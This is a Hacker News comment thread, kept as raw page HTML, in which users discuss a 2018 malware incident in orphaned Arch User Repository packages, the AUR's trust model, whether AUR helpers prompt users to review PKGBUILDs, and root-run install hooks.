          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T21:38:20"><a href="item?id=17502422">on July 10, 2018</a></span> <span id="unv_17502422"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17502270" class="clicky" aria-hidden="true">parent</a> | <a href="#17501979" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502422" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; The other point to this is how is this sort of compromise best communicated? It&#x27;s important enough to hit [0] and obviously this news site, the mailinglist[1], but not the frontpage of arch itself.<p>I brought it up partially, and the simple explanation is; We don&#x27;t. It&#x27;s unsupported and compromised packages happens. There is no system in place to warn about it and the frontpage is reserved for news about issues regarding official packages.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17501979'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17501979'href='vote?id=17501979&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=craftyguy" class="hnuser">craftyguy</a> <span class="age" title="2018-07-10T20:44:07"><a href="item?id=17501979">on July 10, 2018</a></span> <span id="unv_17501979"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17501948" class="clicky" aria-hidden="true">parent</a> | <a href="#17502270" class="clicky" aria-hidden="true">prev</a> | <a href="#17502940" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501979" n="9" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; while all AUR helpers I&#x27;ve seen explicitly ask you if you&#x27;d like to first review the files in an editor<p>The good ones do, yes.<p>&gt;  with a default answer of [Y]es.<p>And therein lies the problem. You may review a handful up front, but then convince yourself that all is good since it&#x27;s much easier to just press &#x27;enter&#x27; and move on. It&#x27;s MUCH easier to ignore a PKGBUILD when you have to hit one key to skip it than it is if you have to manually download it, put it somewhere, and &#x27;makepkg&#x27; on it.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502171'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17502171'href='vote?id=17502171&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jolmg" class="hnuser">jolmg</a> <span class="age" title="2018-07-10T21:07:38"><a href="item?id=17502171">on July 10, 2018</a></span> <span id="unv_17502171"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17501979" class="clicky" aria-hidden="true">parent</a> | <a href="#17502940" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502171" n="8" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I think you misread. Pressing &#x27;enter&#x27; opens up the editor to review the files. To ignore them, you&#x27;d have to answer [n]o.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502265'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17502265'href='vote?id=17502265&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=craftyguy" class="hnuser">craftyguy</a> <span class="age" title="2018-07-10T21:17:29"><a href="item?id=17502265">on July 10, 2018</a></span> <span id="unv_17502265"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17502171" class="clicky" aria-hidden="true">parent</a> | <a href="#17502940" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502265" n="7" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Ah, in that case, most I&#x27;ve come across do <i>not</i> default to &#x27;edit&#x27;, but rather to accept. Notice that many default to automatic building: <a href="https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;AUR_helpers#Active" rel="nofollow">https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;AUR_helpers#Active</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502538'><td><table border='0'>  <tr>    <td class='ind' indent='6'><img src="s.gif" height="1" width="240"></td><td valign="top" class="votelinks">
      <center><a id='up_17502538'href='vote?id=17502538&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jolmg" class="hnuser">jolmg</a> <span class="age" title="2018-07-10T21:53:16"><a href="item?id=17502538">on July 10, 2018</a></span> <span id="unv_17502538"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17502265" class="clicky" aria-hidden="true">parent</a> | <a href="#17502940" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502538" n="6" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Huh. Thanks for the link; I hadn&#x27;t realized that pacaur was announced unmaintained last December. I&#x27;ll have to look for a replacement.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503474'><td><table border='0'>  <tr>    <td class='ind' indent='7'><img src="s.gif" height="1" width="280"></td><td valign="top" class="votelinks">
      <center><a id='up_17503474'href='vote?id=17503474&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=bscphil" class="hnuser">bscphil</a> <span class="age" title="2018-07-11T00:36:08"><a href="item?id=17503474">on July 11, 2018</a></span> <span id="unv_17503474"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17502538" class="clicky" aria-hidden="true">parent</a> | <a href="#17502992" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503474" n="4" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">The developer of pacaur now works on auracle.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503518'><td><table border='0'>  <tr>    <td class='ind' indent='8'><img src="s.gif" height="1" width="320"></td><td valign="top" class="votelinks">
      <center><a id='up_17503518'href='vote?id=17503518&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-11T00:44:53"><a href="item?id=17503518">on July 11, 2018</a></span> <span id="unv_17503518"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17503474" class="clicky" aria-hidden="true">parent</a> | <a href="#17502992" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503518" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Falconindy is not the developer of pacaur.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503688'><td><table border='0'>  <tr>    <td class='ind' indent='9'><img src="s.gif" height="1" width="360"></td><td valign="top" class="votelinks">
      <center><a id='up_17503688'href='vote?id=17503688&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=bscphil" class="hnuser">bscphil</a> <span class="age" title="2018-07-11T01:17:25"><a href="item?id=17503688">on July 11, 2018</a></span> <span id="unv_17503688"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17503518" class="clicky" aria-hidden="true">parent</a> | <a href="#17502992" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503688" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">That&#x27;s right, I was thinking of Cower. My mistake.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503803'><td><table border='0'>  <tr>    <td class='ind' indent='10'><img src="s.gif" height="1" width="400"></td><td valign="top" class="votelinks">
      <center><a id='up_17503803'href='vote?id=17503803&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jolmg" class="hnuser">jolmg</a> <span class="age" title="2018-07-11T01:43:43"><a href="item?id=17503803">on July 11, 2018</a></span> <span id="unv_17503803"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17503688" class="clicky" aria-hidden="true">parent</a> | <a href="#17502992" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503803" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Oh man, I&#x27;m feeling uninformed. So cower is being deprecated and Falconindy is rewriting it as auracle. I guess that&#x27;s 2 programs I&#x27;ll have to replace. At least I know this one&#x27;s replacement.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                              <tr class='athing comtr' id='17502992'><td><table border='0'>  <tr>    <td class='ind' indent='7'><img src="s.gif" height="1" width="280"></td><td valign="top" class="votelinks">
      <center><a id='up_17502992'href='vote?id=17502992&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=imtringued" class="hnuser">imtringued</a> <span class="age" title="2018-07-10T23:10:11"><a href="item?id=17502992">on July 10, 2018</a></span> <span id="unv_17502992"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17502538" class="clicky" aria-hidden="true">parent</a> | <a href="#17503474" class="clicky" aria-hidden="true">prev</a> | <a href="#17502940" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502992" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">aurman is the best replacement</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                                                      <tr class='athing comtr' id='17502940'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17502940'href='vote?id=17502940&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=erwan" class="hnuser">erwan</a> <span class="age" title="2018-07-10T22:59:41"><a href="item?id=17502940">on July 10, 2018</a></span> <span id="unv_17502940"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">prev</a> | <a href="#17503205" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502940" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I don&#x27;t know a single Arch Linux user who doesn&#x27;t check the PKGBUILD of the packages they get from AUR.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503396'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17503396'href='vote?id=17503396&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=lsh" class="hnuser">lsh</a> <span class="age" title="2018-07-11T00:19:10"><a href="item?id=17503396">on July 11, 2018</a></span> <span id="unv_17503396"></span>          <span class='navs'>
             | <a href="#17502940" class="clicky" aria-hidden="true">parent</a> | <a href="#17503205" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503396" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">pleased to meetcha, you now know one.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17503205'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17503205'href='vote?id=17503205&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=young_unixer" class="hnuser">young_unixer</a> <span class="age" title="2018-07-10T23:43:57"><a href="item?id=17503205">on July 10, 2018</a></span> <span id="unv_17503205"></span>          <span class='navs'>
             | <a href="#17502940" class="clicky" aria-hidden="true">prev</a> | <a href="#17501438" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503205" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c73">I really hope one day Linux stops using package managers and switches to single-file binary installers as in Windows and Mac. Until that day, I won&#x27;t feel completely comfortable using Linux.<p>Package managers are an inherently flawed way to distribute software, instead of obtaining your programs from whoever developed that program you get it from your OS developer!.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17501438'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17501438'href='vote?id=17501438&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=chimeracoder" class="hnuser">chimeracoder</a> <span class="age" title="2018-07-10T19:44:55"><a href="item?id=17501438">on July 10, 2018</a></span> <span id="unv_17501438"></span>          <span class='navs'>
             | <a href="#17503205" class="clicky" aria-hidden="true">prev</a> <a class="togg clicky" id="17501438" n="34" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c88">The Arch User Repository hosts whatever people want to upload to it, with basically no proactive vetting whatsoever. In addition, the installation scripts run arbitrary code, a portion of which must run with root privileges. 
When a package gets orphaned, that means that anybody in the community can take over maintainership of the package.<p>There&#x27;s a whole lot of trust that has to go on when installing a package from the AUR - and yes, this is a fundamental problem with the security model of Arch Linux, but that&#x27;s been known for a very long time.<p>Honestly, I&#x27;d be surprised if this hasn&#x27;t happened before with orphaned packages.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501770'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501770'href='vote?id=17501770&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=LukeShu" class="hnuser">LukeShu</a> <span class="age" title="2018-07-10T20:22:12"><a href="item?id=17501770">on July 10, 2018</a></span> <span id="unv_17501770"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">parent</a> | <a href="#17501628" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501770" n="9" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00"><i>&gt; yes, this is a fundamental problem with the security model of Arch Linux</i><p>No, it&#x27;s not.  AUR is not Arch, and is not &quot;supported&quot; by Arch.<p>It&#x27;s a fundamental problem with the security model running code from randos on the internet.  If someone published a git repo on GitHub that installed malware when you ran<p><pre><code>    git clone git:&#x2F;&#x2F;github.com&#x2F;user&#x2F;repo . &amp;&amp; .&#x2F;configure &amp;&amp; make &amp;&amp; sudo make install
</code></pre>
you wouldn&#x27;t be saying that &quot;this is a fundamental problem with the security model of git.&quot;<p>From the AUR homepage, in big text:<p><i>&gt; AUR packages are user produced content. Any use of the provided files is at your own risk.</i></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503435'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17503435'href='vote?id=17503435&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=massysett" class="hnuser">massysett</a> <span class="age" title="2018-07-11T00:28:47"><a href="item?id=17503435">on July 11, 2018</a></span> <span id="unv_17503435"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501770" class="clicky" aria-hidden="true">parent</a> | <a href="#17502618" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503435" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">AUR has the word &quot;Arch&quot; in its name and is linked right at the top of the Arch Linux homepage and from every Arch Linux webpage. So it&#x27;s disingenuous to claim it is &quot;not Arch.”<p>Contrast this to the old debian-multimedia, which had no links from Debian.org and which eventually yielded to pressure to change its name to make clear that it was not part of Debian.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17502618'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502618'href='vote?id=17502618&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=arendtio" class="hnuser">arendtio</a> <span class="age" title="2018-07-10T22:05:06"><a href="item?id=17502618">on July 10, 2018</a></span> <span id="unv_17502618"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501770" class="clicky" aria-hidden="true">parent</a> | <a href="#17503435" class="clicky" aria-hidden="true">prev</a> | <a href="#17502503" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502618" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Just to emphasize how little AUR is supported by Arch:<p>Even the &#x27;AUR helpers&#x27; aren&#x27;t part of the normal Arch repositories. So if you wan&#x27;t a less manual access to the AUR you have to install such a program manually.<p>And the Arch Wiki states:<p><pre><code>  Warning: AUR helpers are not supported by Arch Linux. It is recommended to become familiar with the manual build process in order to be prepared to troubleshoot problems on one&#x27;s own. [1]
</code></pre>
[1]: <a href="https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;AUR_helpers" rel="nofollow">https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;AUR_helpers</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17502503'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502503'href='vote?id=17502503&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=cakes" class="hnuser">cakes</a> <span class="age" title="2018-07-10T21:50:27"><a href="item?id=17502503">on July 10, 2018</a></span> <span id="unv_17502503"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501770" class="clicky" aria-hidden="true">parent</a> | <a href="#17502618" class="clicky" aria-hidden="true">prev</a> | <a href="#17502320" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502503" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I understand your point but the problem is that the title is &quot;Arch Linux AUR Repository Found to Contain Malware&quot; (and not, for example: &quot;AUR Repository Found to Contain Malware&quot;). I would argue that the implication (I guess reputation-wise if that matters) starts with the &quot;Arch Linux&quot; part. It&#x27;s easy to jump on Arch because of this regardless of the fact that the AUR is not supported. At a cursory glance plenty of people (though incorrect) will equate this to &quot;Arch Linux contains malware&quot;</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502838'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502838'href='vote?id=17502838&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=otterlicious" class="hnuser">otterlicious</a> <span class="age" title="2018-07-10T22:41:25"><a href="item?id=17502838">on July 10, 2018</a></span> <span id="unv_17502838"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17502503" class="clicky" aria-hidden="true">parent</a> | <a href="#17502320" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502838" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">This isn&#x27;t unique to Linux.<p>Most people would read &quot;Apple App Store Found to Contain Malware&quot; as &quot;Apple Devices Found to Contain Malware&quot; too.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503813'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17503813'href='vote?id=17503813&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=skolemtotem" class="hnuser">skolemtotem</a> <span class="age" title="2018-07-11T01:44:40"><a href="item?id=17503813">on July 11, 2018</a></span> <span id="unv_17503813"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17502838" class="clicky" aria-hidden="true">parent</a> | <a href="#17502320" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503813" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">The App Store is closer to the official Arch repos, since it is vetted by Apple. The AUR is closer to just downloading stuff off the Internet.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                        <tr class='athing comtr' id='17502320'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502320'href='vote?id=17502320&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=xiii1408" class="hnuser">xiii1408</a> <span class="age" title="2018-07-10T21:25:17"><a href="item?id=17502320">on July 10, 2018</a></span> <span id="unv_17502320"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501770" class="clicky" aria-hidden="true">parent</a> | <a href="#17502503" class="clicky" aria-hidden="true">prev</a> | <a href="#17501628" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502320" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">AUR PKGBUILDs are much more restricted than this, since they&#x27;re restricted to a fakeroot.<p>Of course, if you&#x27;re ultimately going to <i>run</i> the program, the binary set up by the PKGBUILD has a lot of control.  But the PKGBUILD itself is limited in what it can do (to things like listing your installed packages, getting `uname -a`--the stuff mentioned in the article).</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502598'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502598'href='vote?id=17502598&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=LukeShu" class="hnuser">LukeShu</a> <span class="age" title="2018-07-10T22:02:31"><a href="item?id=17502598">on July 10, 2018</a></span> <span id="unv_17502598"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17502320" class="clicky" aria-hidden="true">parent</a> | <a href="#17501628" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502598" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">No.  Whatever you stick in the install= file will run as root at install time.  If you&#x27;re using an AUR helper&#x2F;running `makepkg -i`, the PKGBUILD absolutely can run code as root, without waiting for you to interact with the installed program.  Installing a package from a PKGBUILD is no more or no less &quot;powerful&quot; to an attacker than `make &amp;&amp; sudo make install`.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17508870'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17508870'href='vote?id=17508870&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=xiii1408" class="hnuser">xiii1408</a> <span class="age" title="2018-07-11T17:54:14"><a href="item?id=17508870">on July 11, 2018</a></span> <span id="unv_17508870"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17502598" class="clicky" aria-hidden="true">parent</a> | <a href="#17501628" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17508870" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">The install hooks are chrooted inside the pacman install directory.<p>But, yeah, they run as root, so they can still do damage.<p>My point was that the danger zone is when you trust the package, rather than when you run the PKGBUILD itself with `makepkg`.  Of course `makepkg -i` runs both `makepkg` and `pacman` as root.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                              <tr class='athing comtr' id='17501628'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501628'href='vote?id=17501628&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Latty" class="hnuser">Latty</a> <span class="age" title="2018-07-10T20:08:41"><a href="item?id=17501628">on July 10, 2018</a></span> <span id="unv_17501628"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">parent</a> | <a href="#17501770" class="clicky" aria-hidden="true">prev</a> | <a href="#17501768" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501628" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; this is a fundamental problem with the security model of Arch Linux<p>And with every other OS that isn&#x27;t locked down so the user can&#x27;t run arbitrary stuff.<p>The AUR is just the arch equivalent of downloading a `.exe` installer and running it. Yes, clearly there are security concerns there, but they aren&#x27;t specific to Arch.<p>If you want a level of trust, then don&#x27;t build AUR packages and install things using the package manager (AUR packages aren&#x27;t supported by it) which have trusted maintainers and are signed.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
